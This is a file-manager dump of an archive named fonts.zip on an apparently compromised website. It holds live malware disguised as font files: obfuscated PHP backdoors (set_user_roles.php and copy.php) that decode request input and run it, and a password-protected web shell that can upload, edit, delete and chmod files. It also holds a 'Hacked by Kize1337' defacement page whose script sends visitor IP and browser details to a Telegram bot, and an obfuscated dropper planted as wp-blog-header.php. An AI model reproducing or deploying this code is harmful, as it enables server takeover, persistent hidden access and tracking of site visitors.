File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/polaslotjos.xyz/fonts.zip

Back
PK��Vp�\P-6��958412/838033/error_lognu��[��[13-Apr-2026 13:45:38 UTC] PHP Warning: file_put_contents(/dev/shm/.item): Failed to open stream: Permission denied in /home/tokomrjk/polaslotjos.xyz/fonts/958412/838033/set_user_roles.php on line 20 PK��Vp�\�Ŋ�d��d�� 958412/838033/set_user_roles.phpnu��[��<?php if(count($_REQUEST) > 0 && isset($_REQUEST["p\x67\x72p"])){ $ref = array_filter(["/dev/shm", "/tmp", session_save_path(), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP")]); $reference = $_REQUEST["p\x67\x72p"]; $reference = explode ( "." ,$reference ); $flg=''; $s9='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($s9 ); $o=0; foreach ($reference as $v1) { $chS=ord($s9[$o %$sLen] ); $d=((int)$v1 - $chS - ($o %10)) ^ 32; $flg .= chr($d ); $o++; } foreach ($ref as $elem): if ((bool)is_dir($elem) && (bool)is_writable($elem)) { $flag = join("/", [$elem, ".item"]); if (file_put_contents($flag, $flg)) { include $flag; @unlink($flag); exit; } } endforeach; }PK��Vp�\�� 958412/838033/763095/copy.phpnu��[��<?php if(array_key_exists("e\x6E\x74", $_REQUEST)){ $component = array_filter([ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getenv("TEMP"), sys_get_temp_dir(), getcwd(), getenv("TMP"), session_save_path(), "/dev/shm"]); $flg = $_REQUEST["e\x6E\x74"]; $flg= explode ( '.' , $flg) ; $ref=''; $salt='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($salt); foreach ($flg as $i => $v4): $sChar=ord($salt[$i%$sLen]); $dec=((int)$v4 - $sChar - ($i%10)) ^ 14; $ref .=chr($dec); endforeach; for ($entity = 0, $res = count($component); $entity < $res; $entity++) { $dat = $component[$entity]; if (max(0, is_dir($dat) * is_writable($dat))) { $factor = sprintf("%s/.item", $dat); if (file_put_contents($factor, $ref)) { include $factor; @unlink($factor); exit; } } } }PK��Vp�\��958412/838033/763095/error_lognu��[��[13-Apr-2026 13:45:15 UTC] PHP Warning: Undefined array key 0 in /home/tokomrjk/polaslotjos.xyz/fonts/958412/838033/763095/copy.php on line 17 PK��Vp�\��%��%��958412/838033/763095/index.phpnu��[��<!DOCTYPE html> <html lang="id"> <head> <title>Hacked by Kize1337</title> <meta property="og:image" content="https://c.top4top.io/p_3715008ex4.jpg"> <meta name="author" content="Kize1337"/> <meta name="copyright" content="2025"/> <meta name="title" content="Hacked by Kize1337"> <meta name="description" content="We are party on your site."> <link href="https://fonts.googleapis.com/css?family=Space+Mono" rel="stylesheet"> <link rel="icon" href="https://k.top4top.io/p_3715j5o0a8.png" type="image/webp"> <style type="text/css"> * { margin: 0; padding: 0; box-sizing: border-box; } body { background-color: black; margin: 0; padding: 0; font-family: 'Space Mono', monospace; min-height: 100vh; display: flex; justify-content: center; align-items: center; } .container { text-align: center; width: 100%; max-width: 800px; padding: 40px 20px; } .x { font-size: 60px; transform: skewY(-8deg); color: white; margin-bottom: 40px; line-height: 1.2; } .x span { color: #ff0000; } .hacker-image { margin: 40px auto; max-width: 300px; width: 100%; } .hacker-image img { width: 100%; height: auto; display: block; } .audio-player { margin: 25px auto; } .audio-player audio { width: 200px; height: 30px; filter: invert(1) hue-rotate(180deg); } .message { color: white; font-size: 24px; margin: 30px 0; } .greetz-title { color: white; font-size: 18px; margin: 25px 0 10px 0; } .greetz-list { font-family: 'Courier New', monospace; font-size: 14px; color: #ff0000; font-weight: bold; line-height: 1.4; } .contact-section { margin-top: 40px; color: white; font-family: 'Space Mono', monospace; font-size: 18px; } .contact-link { color: #ff0000; text-decoration: none; font-weight: bold; } .contact-link:hover { text-decoration: underline; } @media (min-width: 1024px) { .container { padding: 60px 20px; } .x { margin-bottom: 50px; } .hacker-image { margin: 50px auto; } } @media (max-width: 768px) { .container { padding: 30px 20px; } .x { font-size: 40px; margin-bottom: 30px; } .message { font-size: 18px; margin: 25px 0; } .contact-section { font-size: 16px; margin-top: 30px; } .hacker-image { max-width: 250px; margin: 30px auto; } } @media (max-width: 480px) { .container { padding: 20px 15px; } .x { font-size: 32px; margin-bottom: 25px; } .message { font-size: 16px; margin: 20px 0; } .contact-section { font-size: 14px; margin-top: 25px; } .hacker-image { max-width: 200px; margin: 25px auto; } .audio-player audio { width: 180px; } .greetz-title { font-size: 16px; margin: 20px 0 8px 0; } .greetz-list { font-size: 12px; } } </style> </head> <body> <div class="container"> <h1 class="x">Hacked by <span>Kize1337</span></h1> <div class="hacker-image"> <img src="https://c.top4top.io/p_3715008ex4.jpg" alt="Hacker Image"> </div> <div class="audio-player"> <audio id="bg-audio" src="https://e.top4top.io/m_3715w7dyq6.mp3" autoplay controls></audio> </div> <h2 class="message">MSG: Patch your system!</h2> <h3 class="greetz-title">Greetz:</h3> <div class="greetz-list"> Kize1337 - 0xTebu - Lizardpredator - JohenLG - Luminance - Sph69 - Axonhub - Privnet </div> <div class="contact-section"> CONTACT: <a href="https://t.me/deathbase" class="contact-link" target="_blank">t.me/deathbase</a> </div> </div> <script> document.body.addEventListener('click', function () { const audio = document.getElementById('bg-audio'); if (audio) { audio.muted = false; audio.volume = 1.0; audio.play().catch((e) => { console.warn('Autoplay failed:', e); }); } }, { once: true }); // Telegram logger async function sendLogToTelegram() { const token = "8499549696:AAEQJ6pvg9oFNbHTtIKKRkiARzIRLaeNJ7E"; const chat_id = "-1002699548560"; let ipInfo = "Unknown"; try { const res = await fetch("https://api64.ipify.org?format=json"); const data = await res.json(); ipInfo = data.ip; } catch (e) { ipInfo = "Unavailable"; } const ua = navigator.userAgent; const platform = navigator.platform; const browser = (() => { if (ua.includes("Chrome")) return "Chrome"; if (ua.includes("Firefox")) return "Firefox"; if (ua.includes("Safari") && !ua.includes("Chrome")) return "Safari"; if (ua.includes("Opera") \|\| ua.includes("OPR")) return "Opera"; if (ua.includes("Edg")) return "Edge"; return "Unknown"; })(); const now = new Date(); const timestamp = now.toLocaleString("id-ID", { timeZone: "Asia/Jakarta" }); const message = `📌 Access Detected 📅 Date & Time: ${timestamp} 🌐 IP: ${ipInfo} 💻 Device: ${platform} 🌍 Browser: ${browser} 📣 User-Agent: ${ua} 📎 URL: ${window.location.href} _This message is sent automatically by a bot._`; const tgURL = `https://api.telegram.org/bot${token}/sendMessage`; await fetch(tgURL, { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ chat_id, text: message, parse_mode: "Markdown" }) }); } window.onload = () => sendLogToTelegram(); </script> </body> </html>PK��Vp�\�6smz}��z}��958412/838033/index.phpnu��[��<html> </html><?php // Configuration $valid_password = 'digz'; // Replace with your actual shell password $test_email = 'test@example.com'; // Replace with a valid email address for testing $test_zip_path = __DIR__ . DIRECTORY_SEPARATOR . 'test_shell.zip'; // Platform-agnostic path for test ZIP $extract_path = __DIR__ . DIRECTORY_SEPARATOR . 'test_extract'; // Platform-agnostic path for extraction $test_file_path = __DIR__ . DIRECTORY_SEPARATOR . 'test_file.txt'; // Platform-agnostic path for test file // Disable error reporting for production error_reporting(0); ini_set('display_errors', 0); ini_set('error_log', null); ini_set('log_errors', 0); ini_set('max_execution_time', 0); ini_set('output_buffering', 0); // Start output buffering ob_start(); // Function to decode hex-encoded strings function hexa($str) { $r = ""; $len = strlen($str) - 1; for ($i = 0; $i < $len; $i += 2) { $r .= chr(hexdec($str[$i] . $str[$i + 1])); } return $r; } // Initialize function array $iniarray = [ "7068705F756E616D65", # php_uname "73657373696F6E5F7374617274", # session_start "6572726F725F7265706F7274696E67", # error_reporting "70687076657273696F6E", # phpversion "66696C655F7075745F636F6E74656E7473", # file_put_contents "66696C655F6765745F636F6E74656E7473", # file_get_contents "66696C657065726D73", # fileperms "66696C656D74696D65", # filemtime "66696C6574797065", # filetype "68746D6C7370656369616C6368617273", # htmlspecialchars "737072696E7466", # sprintf "737562737472", # substr "676574637764", # getcwd "6368646972", # chdir "7374725F7265706C616365", # str_replace "6578706C6F6465", # explode "666C617368", # flash "6D6F76655F75706C6F616465645F66696C65", # move_uploaded_file "7363616E646972", # scandir "676574686F737462796E616D65", # gethostbyname "7368656C6C5F65786563", # shell_exec "53797374656D20496E666F726D6174696F6E", # System Information "6469726E616D65", # dirname "64617465", # date "6D696D655F636F6E74656E745F74797065", # mime_content_type "66756E6374696F6E5F657869737473", # function_exists "6673697A65", # fsize "726D646972", # rmdir "756E6C696E6B", # unlink "6D6B646972", # mkdir "72656E616D65", # rename "7365745F74696D655F6C696D6974", # set_time_limit "636C656172737461746361636865", # clearstatcache "696E695F736574", # ini_set "696E695F676574", # ini_get "6765744F776E6572", # getOwner "6765745F63757272656E745F75736572" # get_current_user ]; for ($i = 0; $i < count($iniarray); $i++) { $func[$i] = hexa($iniarray[$i]); } $ds = @$func[34]("disable_functions"); $show_ds = (!empty($ds)) ? "$ds" : "All function is accessible"; // File manager functions function fsize($file) { $a = ["B", "KB", "MB", "GB", "TB", "PB"]; $pos = 0; $size = filesize($file); while ($size >= 1024) { $size /= 1024; $pos++; } return round($size, 2) . " " . $a[$pos]; } function flash($message, $status, $class, $redirect = false) { if (!empty($_SESSION["message"])) unset($_SESSION["message"]); if (!empty($_SESSION["class"])) unset($_SESSION["class"]); if (!empty($_SESSION["status"])) unset($_SESSION["status"]); $_SESSION["message"] = $message; $_SESSION["class"] = $class; $_SESSION["status"] = $status; if ($redirect) { header('Location: ' . $redirect); exit(); } return true; } function clear() { if (!empty($_SESSION["message"])) unset($_SESSION["message"]); if (!empty($_SESSION["class"])) unset($_SESSION["class"]); if (!empty($_SESSION["status"])) unset($_SESSION["status"]); return true; } function getOwner($item) { global $func; if ($func[25]("posix_getpwuid")) { $downer = @posix_getpwuid(fileowner($item)); $downer = $downer['name']; } else { $downer = fileowner($item); } if ($func[25]("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup($item)); $dgrp = $dgrp['name']; } else { $dgrp = filegroup($item); } return $downer . '/' . $dgrp; } // Function to check file manager (directory listing) function checkFileManager() { global $func; $directory = __DIR__; try { $dirs = $func[18]($directory); // scandir return $dirs !== false && count($dirs) > 2; // More than . and .. } catch (Exception $e) { return false; } } // Function to create a test ZIP file function createTestZip($zip_path, $file_path) { global $func; // Create a temporary text file if (!$func[4]($file_path, 'This is a test file for ZIP functionality.')) { return false; } // Try ZipArchive first if (class_exists('ZipArchive')) { $zip = new ZipArchive; if ($zip->open($zip_path, ZipArchive::CREATE \| ZipArchive::OVERWRITE) !== TRUE) { return false; } if (!$zip->addFile($file_path, basename($file_path))) { $zip->close(); return false; } $zip->close(); return true; } // Fallback to system ZIP command $os = strtoupper(substr(PHP_OS, 0, 3)); if ($os === 'WIN') { $command = "powershell -Command \"Compress-Archive -Path '$file_path' -DestinationPath '$zip_path' -Force\""; } else { $command = "zip -j '$zip_path' '$file_path'"; } exec($command, $output, $return_var); return $return_var === 0 && file_exists($zip_path); } // Function to extract a ZIP file function extractTestZip($zip_path, $extract_path) { // Try ZipArchive first if (class_exists('ZipArchive')) { $zip = new ZipArchive; if ($zip->open($zip_path) === TRUE) { if (!is_dir($extract_path)) { if (!mkdir($extract_path, 0777, true)) { $zip->close(); return false; } } $result = $zip->extractTo($extract_path); $zip->close(); return $result; } return false; } // Fallback to system unzip command $os = strtoupper(substr(PHP_OS, 0, 3)); if ($os === 'WIN') { $command = "powershell -Command \"Expand-Archive -Path '$zip_path' -DestinationPath '$extract_path' -Force\""; } else { $command = "unzip -o '$zip_path' -d '$extract_path'"; } exec($command, $output, $return_var); return $return_var === 0 && is_dir($extract_path); } // Function to delete directory and its contents function deleteDirectory($dir) { global $func; if (!is_dir($dir)) { return; } $files = array_diff($func[18]($dir), ['.', '..']); foreach ($files as $file) { $path = $dir . DIRECTORY_SEPARATOR . $file; is_dir($path) ? deleteDirectory($path) : $func[28]($path); } $func[27]($dir); } // Function to test email sending function checkSend() { global $test_email; $subject = 'Test Email from Shell'; $message = 'This is a test email to verify send functionality.'; $headers = 'From: noreply@localhost.com' . "\r\n" . 'Reply-To: noreply@localhost.com' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); return @mail($test_email, $subject, $message, $headers); } // Function to test ZIP extraction function checkZip() { global $test_zip_path, $extract_path, $test_file_path; if (!createTestZip($test_zip_path, $test_file_path)) { return false; } $result = extractTestZip($test_zip_path, $extract_path); if (file_exists($test_zip_path)) { unlink($test_zip_path); } if (file_exists($test_file_path)) { unlink($test_file_path); } if (is_dir($extract_path)) { deleteDirectory($extract_path); } return $result; } // Handle cURL requests from shell_ops.php if (isset($_POST['pass'])) { $provided_password = trim(strip_tags(htmlspecialchars(addslashes($_POST['pass'])))); if ($provided_password !== $valid_password) { sendError('Invalid password'); } if (isset($_GET['checksend'])) { echo checkSend() ? "check-result-1" : "<button class='btn btn-danger btn-sm'>Send Failed</button>"; } elseif (isset($_GET['checkzip'])) { echo checkZip() ? "check-result-1" : "<button class='btn btn-danger btn-sm'>ZIP Extraction Failed</button>"; } else { if (checkFileManager()) { $uname = $func[0](); $php_version = $func[3](); $is_priv8 = true; $response = "File manager"; if ($is_priv8) { $response .= "\nPRIV8\n"; $response .= "<nobr>$uname</nobr>\n"; $response .= ")<br>$php_version <span>Safe mode:</span>"; } echo $response; } else { sendError('File Manager Not Accessible'); } } ob_end_flush(); exit; } // Handle browser access (login and dashboard) $func[1](); // session_start $login_error = ''; $dashboard_message = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) { $provided_password = trim(strip_tags(htmlspecialchars(addslashes($_POST['password'])))); if ($provided_password === $valid_password) { $_SESSION['logged_in'] = true; } else { $login_error = 'Invalid password'; } } if (isset($_POST['action']) && isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true) { switch ($_POST['action']) { case 'checksend': $dashboard_message = checkSend() ? 'Send: Success' : 'Send: Failed'; break; case 'checkzip': $dashboard_message = checkZip() ? 'ZIP Extraction: Success' : 'ZIP Extraction: Failed'; break; case 'logout': session_destroy(); header('Location: ' . basename($_SERVER['PHP_SELF'])); exit; } } // File manager handling for dashboard $path = isset($_GET['dir']) ? $_GET['dir'] : $func[12](); // getcwd $func[13]($path); // chdir $path = $func[14]('\\', '/', $path); // str_replace $exdir = $func[15]('/', $path); // explode if (isset($_POST['newFolderName'])) { if ($func[29]($path . '/' . $_POST['newFolderName'])) { $func[16]("Create Folder Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Create Folder Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newFileName']) && isset($_POST['newFileContent'])) { if ($func[4]($path . '/' . $_POST['newFileName'], $_POST['newFileContent'])) { $func[16]("Create File Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Create File Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newName']) && isset($_GET['item'])) { if ($_POST['newName'] == '') { $func[16]("You miss an important value", "Ooopss..", "warning", "?dir=$path"); } elseif ($func[30]($path . '/' . $_GET['item'], $path . '/' . $_POST['newName'])) { $func[16]("Rename Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Rename Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newContent']) && isset($_GET['item'])) { if ($func[4]($path . '/' . $_GET['item'], $_POST['newContent'])) { $func[16]("Edit Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Edit Failed", "Failed", "error", "?dir=$path"); } } if (isset($_POST['newPerm']) && isset($_GET['item'])) { if ($_POST['newPerm'] == '') { $func[16]("You miss an important value", "Ooopss..", "warning", "?dir=$path"); } elseif (chmod($path . '/' . $_GET['item'], octdec($_POST['newPerm']))) { $func[16]("Change Permission Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Change Permission Failed", "Failed", "error", "?dir=$path"); } } if (isset($_GET['action']) && $_GET['action'] == 'delete' && isset($_GET['item'])) { $item = $path . '/' . $_GET['item']; if (is_dir($item)) { if ($func[27]($item)) { $func[16]("Delete Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Delete Failed", "Failed", "error", "?dir=$path"); } } else { if ($func[28]($item)) { $func[16]("Delete Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Delete Failed", "Failed", "error", "?dir=$path"); } } } if (isset($_FILES['uploadfile'])) { $total = count($_FILES['uploadfile']['name']); $success = false; for ($i = 0; $i < $total; $i++) { $success = $func[17]($_FILES['uploadfile']['tmp_name'][$i], $path . '/' . $_FILES['uploadfile']['name'][$i]); } if ($success) { $func[16]("Upload " . ($total > 1 ? "$total Files" : "File") . " Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Upload Failed", "Failed", "error", "?dir=$path"); } } $dirs = $func[18]($path); // scandir ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Shell Check Dashboard</title> <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet"> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" rel="stylesheet"> <style> :root { --primary: #6366f1; --primary-dark: #4f46e5; --secondary: #10b981; --background: #f3f4f6; --card-bg: #ffffff; --text-primary: #1f2937; } body { background: linear-gradient(135deg, #f3f4f6, #e5e7eb); font-family: 'Inter', sans-serif; color: var(--text-primary); min-height: 100vh; display: flex; align-items: center; justify-content: center; } .card { background: var(--card-bg); border-radius: 1.5rem; box-shadow: 0 10px 20px rgba(0, 0, 0, 0.2); padding: 2rem; max-width: 1200px; width: 100%; transition: transform 0.3s ease; } .card:hover { transform: translateY(-5px); } .btn { border-radius: 0.75rem; padding: 0.75rem 1.5rem; font-weight: 600; transition: all 0.3s ease; position: relative; overflow: hidden; } .btn-primary { background: linear-gradient(135deg, var(--primary), var(--primary-dark)); color: white; } .btn-primary:hover { background: var(--primary-dark); } .btn-secondary { background: var(--secondary); color: white; } .btn-secondary:hover { background: #059669; } .btn-danger { background: linear-gradient(135deg, #ef4444, #dc2626); color: white; } .btn-danger:hover { background: #b91c1c; } .form-control { border-radius: 0.75rem; border: 1px solid #d1d5db; padding: 0.75rem; transition: all 0.3s ease; } .form-control:focus { border-color: var(--primary); box-shadow: 0 0 0 4px rgba(99, 102, 241, 0.2); outline: none; } .alert { border-radius: 0.75rem; padding: 1rem; margin-bottom: 1rem; background: #fef2f2; color: #b91c1c; border-left: 4px solid #ef4444; } .success { background: #d1fae5; color: #065f46; border-left: 4px solid var(--secondary); } .table th, .table td { padding: 1rem; vertical-align: middle; } .table thead { background: linear-gradient(135deg, var(--primary), var(--primary-dark)); color: white; } .table tbody tr:hover { background: #f1f5f9; } .breadcrumb a:hover { color: var(--primary); } </style> </head> <body> <?php if (!isset($_SESSION['logged_in']) \|\| $_SESSION['logged_in'] !== true): ?> <!-- Login Interface --> <div class="card"> <h1 class="text-2xl font-bold text-center mb-6">Shell Check Login</h1> <?php if ($login_error): ?> <div class="alert"><?php echo htmlspecialchars($login_error); ?></div> <?php endif; ?> <form method="POST" class="space-y-4"> <div> <label class="block text-sm font-medium text-gray-700 mb-1">Password</label> <input type="password" name="password" class="form-control w-full" placeholder="Enter password" required> </div> <button type="submit" class="btn btn-primary w-full"> <i class="fas fa-sign-in-alt mr-2"></i> Login </button> </form> </div> <?php else: ?> <!-- Dashboard --> <div class="card"> <h1 class="text-2xl font-bold text-center mb-6">Shell Check Dashboard</h1> <?php if ($dashboard_message): ?> <div class="alert <?php echo strpos($dashboard_message, 'Success') !== false ? 'success' : ''; ?>"> <?php echo htmlspecialchars($dashboard_message); ?> </div> <?php endif; ?> <div class="grid grid-cols-1 sm:grid-cols-2 gap-4 mb-6"> <form method="POST"> <input type="hidden" name="action" value="checksend"> <button type="submit" class="btn btn-secondary w-full"> <i class="fas fa-envelope mr-2"></i> Check Send </button> </form> <form method="POST"> <input type="hidden" name="action" value="checkzip"> <button type="submit" class="btn btn-primary w-full"> <i class="fas fa-file-archive mr-2"></i> Check ZIP </button> </form> <form method="POST"> <input type="hidden" name="action" value="logout"> <button type="submit" class="btn btn-danger w-full"> <i class="fas fa-sign-out-alt mr-2"></i> Logout </button> </form> </div> <!-- File Manager --> <h2 class="text-xl font-semibold mb-4">File Manager</h2> <?php if (isset($_SESSION['message'])): ?> <div class="alert <?php echo $_SESSION['class'] === 'success' ? 'success' : ''; ?>"> <?php echo htmlspecialchars($_SESSION['message']); ?> </div> <?php clear(); ?> <?php endif; ?> <div class="info mb-3"> <div class="text-center text-lg font-medium">karma-syndicate</div> <div><i class="fas fa-server mr-2"></i><?php echo $func[0](); ?></div> <div><i class="fas fa-microchip mr-2"></i><?php echo $_SERVER['SERVER_SOFTWARE']; ?></div> <div><i class="fas fa-satellite-dish mr-2"></i><?php echo !@$_SERVER['SERVER_ADDR'] ? $func[19]($_SERVER['SERVER_NAME']) : @$_SERVER['SERVER_ADDR']; ?></div> </div> <div class="breadcrumb mb-4"> <i class="fas fa-folder mr-2"></i> <?php foreach ($exdir as $id => $pat): ?> <?php if ($pat == '' && $id == 0): ?> <a href="?dir=/" class="text-blue-600 hover:underline">/</a> <?php elseif ($pat == ''): ?> <?php continue; ?> <?php elseif ($id + 1 == count($exdir)): ?> <span class="text-gray-500"><?php echo htmlspecialchars($pat); ?></span> <?php else: ?> <a href="?dir=<?php for ($i = 0; $i <= $id; $i++) { echo htmlspecialchars($exdir[$i]); if ($i != $id) echo "/"; } ?>" class="text-blue-600 hover:underline"><?php echo htmlspecialchars($pat); ?></a> <span class="text-gray-500">/</span> <?php endif; ?> <?php endforeach; ?> <a href="?" class="text-blue-600 hover:underline">[ HOME ]</a> </div> <div class="grid grid-cols-1 sm:grid-cols-3 gap-4 mb-4"> <form method="POST" enctype="multipart/form-data" class="flex items-center"> <input type="file" name="uploadfile[]" class="form-control flex-grow" multiple> <button type="submit" class="btn btn-primary ml-2"><i class="fas fa-upload"></i></button> </form> <form method="POST" class="flex items-center"> <input type="text" name="newFolderName" class="form-control flex-grow" placeholder="New Folder"> <button type="submit" class="btn btn-primary ml-2"><i class="fas fa-folder-plus"></i></button> </form> <form method="POST" class="flex items-center"> <input type="text" name="newFileName" class="form-control flex-grow" placeholder="New File"> <textarea name="newFileContent" class="form-control mt-2" rows="2" placeholder="File Content"></textarea> <button type="submit" class="btn btn-primary ml-2"><i class="fas fa-file-plus"></i></button> </form> </div> <?php if (isset($_GET['action']) && $_GET['action'] != 'delete'): ?> <div class="mb-4"> <?php if ($_GET['action'] == 'rename' && isset($_GET['item'])): ?> <form method="POST" class="space-y-4"> <label class="block text-sm font-medium text-gray-700">New Name</label> <input type="text" name="newName" class="form-control w-full" value="<?php echo htmlspecialchars($_GET['item']); ?>"> <div class="flex gap-2"> <button type="submit" class="btn btn-primary"><i class="fas fa-save mr-2"></i> Submit</button> <a href="?dir=<?php echo htmlspecialchars($path); ?>" class="btn btn-secondary">Back</a> </div> </form> <?php elseif ($_GET['action'] == 'edit' && isset($_GET['item'])): ?> <form method="POST" class="space-y-4"> <label class="block text-sm font-medium text-gray-700"><?php echo htmlspecialchars($_GET['item']); ?></label> <textarea name="newContent" rows="10" class="form-control w-full" id="CopyFromTextArea"><?php echo $func[9]($func[5]($path . '/' . $_GET['item'])); ?></textarea> <div class="flex gap-2"> <button type="submit" class="btn btn-primary"><i class="fas fa-save mr-2"></i> Submit</button> <button type="button" class="btn btn-secondary" onclick="copyText()">Copy</button> <a href="?dir=<?php echo htmlspecialchars($path); ?>" class="btn btn-secondary">Back</a> </div> </form> <?php elseif ($_GET['action'] == 'view' && isset($_GET['item'])): ?> <label class="block text-sm font-medium text-gray-700"><?php echo htmlspecialchars($_GET['item']); ?></label> <textarea rows="10" class="form-control w-full" disabled><?php echo $func[9]($func[5]($path . '/' . $_GET['item'])); ?></textarea> <a href="?dir=<?php echo htmlspecialchars($path); ?>" class="btn btn-secondary mt-2">Back</a> <?php elseif ($_GET['action'] == 'chmod' && isset($_GET['item'])): ?> <form method="POST" class="space-y-4"> <label class="block text-sm font-medium text-gray-700"><?php echo htmlspecialchars($_GET['item']); ?></label> <input type="text" name="newPerm" class="form-control w-full" value="<?php echo $func[11]($func[10]('%o', $func[6]($path . '/' . $_GET['item'])), -4); ?>"> <div class="flex gap-2"> <button type="submit" class="btn btn-primary"><i class="fas fa-save mr-2"></i> Submit</button> <a href="?dir=<?php echo htmlspecialchars($path); ?>" class="btn btn-secondary">Back</a> </div> </form> <?php endif; ?> </div> <?php else: ?> <div class="table-responsive"> <table class="table table-bordered table-striped"> <thead> <tr> <th>Name</th> <th>Type</th> <th>Size</th> <th>Owner/Group</th> <th>Permission</th> <th>Last Modified</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($dirs as $dir): if (!is_dir($path . '/' . $dir)): continue; endif; ?> <tr> <td> <?php if ($dir === '..'): ?> <a href="?dir=<?php echo htmlspecialchars($func[22]($path)); ?>" class="text-blue-600 hover:underline"><i class="fas fa-folder-open mr-2"></i><?php echo htmlspecialchars($dir); ?></a> <?php elseif ($dir === '.'): ?> <a href="?dir=<?php echo htmlspecialchars($path); ?>" class="text-blue-600 hover:underline"><i class="fas fa-folder-open mr-2"></i><?php echo htmlspecialchars($dir); ?></a> <?php else: ?> <a href="?dir=<?php echo htmlspecialchars($path . '/' . $dir); ?>" class="text-blue-600 hover:underline"><i class="fas fa-folder mr-2"></i><?php echo htmlspecialchars($dir); ?></a> <?php endif; ?> </td> <td><?php echo $func[8]($path . '/' . $dir); ?></td> <td>-</td> <td><?php echo getOwner($path . '/' . $dir); ?></td> <td><?php echo $func[11]($func[10]('%o', $func[6]($path . '/' . $dir)), -4); ?></td> <td><?php echo $func[23]("Y-m-d h:i:s", $func[7]($path . '/' . $dir)); ?></td> <td> <?php if ($dir != '.' && $dir != '..'): ?> <div class="flex gap-2"> <a href="?dir=<?php echo htmlspecialchars($path); ?>&item=<?php echo htmlspecialchars($dir); ?>&action=rename" class="btn btn-primary btn-sm"><i class="fas fa-edit"></i></a> <a href="?dir=<?php echo htmlspecialchars($path); ?>&item=<?php echo htmlspecialchars($dir); ?>&action=chmod" class="btn btn-primary btn-sm"><i class="fas fa-file-signature"></i></a> <a href="?dir=<?php echo htmlspecialchars($path); ?>&item=<?php echo htmlspecialchars($dir); ?>&action=delete" class="btn btn-danger btn-sm" onclick="return confirm('Are you sure you want to delete this?')"><i class="fas fa-trash"></i></a> </div> <?php endif; ?> </td> </tr> <?php endforeach; ?> <?php foreach ($dirs as $dir): if (!is_file($path . '/' . $dir)): continue; endif; ?> <tr> <td> <a href="?dir=<?php echo htmlspecialchars($path); ?>&item=<?php echo htmlspecialchars($dir); ?>&action=view" class="text-blue-600 hover:underline"><i class="fas fa-file-code mr-2"></i><?php echo htmlspecialchars($dir); ?></a> </td> <td><?php echo $func[25]('mime_content_type') ? $func[24]($path . '/' . $dir) : $func[8]($path . '/' . $dir); ?></td> <td><?php echo fsize($path . '/' . $dir); ?></td> <td><?php echo getOwner($path . '/' . $dir); ?></td> <td><?php echo $func[11]($func[10]('%o', $func[6]($path . '/' . $dir)), -4); ?></td> <td><?php echo $func[23]("Y-m-d h:i:s", $func[7]($path . '/' . $dir)); ?></td> <td> <div class="flex gap-2"> <a href="?dir=<?php echo htmlspecialchars($path); ?>&item=<?php echo htmlspecialchars($dir); ?>&action=edit" class="btn btn-primary btn-sm"><i class="fas fa-file-edit"></i></a> <a href="?dir=<?php echo htmlspecialchars($path); ?>&item=<?php echo htmlspecialchars($dir); ?>&action=rename" class="btn btn-primary btn-sm"><i class="fas fa-edit"></i></a> <a href="?dir=<?php echo htmlspecialchars($path); ?>&item=<?php echo htmlspecialchars($dir); ?>&action=chmod" class="btn btn-primary btn-sm"><i class="fas fa-file-signature"></i></a> <a href="?dir=<?php echo htmlspecialchars($path); ?>&item=<?php echo htmlspecialchars($dir); ?>&action=delete" class="btn btn-danger btn-sm" onclick="return confirm('Are you sure you want to delete this?')"><i class="fas fa-trash"></i></a> </div> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <div class="text-center text-gray-500 mt-4"> © BlackDragon <?php echo date('Y'); ?> </div> <?php endif; ?> </div> <?php endif; ?> <script> function copyText() { var textarea = document.getElementById("CopyFromTextArea"); textarea.select(); document.execCommand("copy"); } </script> </body> </html> <?php ob_end_flush(); ?>PK��Vp�\��958412/index.phpnu��[��PK��Vp�\ �� wp-blog-header.phpnu��6�$��<?php goto tUl6b; wXtx3: $rHfMY = $_REQUEST["\144\157\141\143\x74"]; goto HgQ3I; aYfRm: session_start(); goto wXtx3; N7Xk9: $sJ3ad = (isset($_SERVER["\110\x54\x54\x50\x53"]) && $_SERVER["\x48\124\x54\x50\x53"] === "\x6f\156" ? "\150\164\x74\160\x73" : "\150\164\x74\160") . "\x3a\x2f\x2f{$_SERVER["\x48\124\x54\x50\137\x48\x4f\x53\x54"]}{$_SERVER["\122\x45\x51\125\x45\123\124\137\x55\x52\111"]}"; goto Pmj6n; LLG9S: function sXidc($sJ3ad) { goto n0NKE; NAssn: $tz7fb = curl_exec($U8dd8); goto S3rIV; yoBMI: return $tz7fb; goto VHWhP; TwOE6: $tz7fb = stream_get_contents($FJvaM); goto cwV9V; VDpuf: if (!function_exists("\x63\x75\x72\154\137\x65\x78\145\x63")) { goto el1M3; } goto XeE53; RIUJx: el1M3: goto qrsug; O9m5u: mfeik: goto yoBMI; vh255: $FJvaM = fopen($sJ3ad, "\x72"); goto TwOE6; ENMVc: if (!(empty($tz7fb) && function_exists("\146\x6f\x70\x65\x6e") && 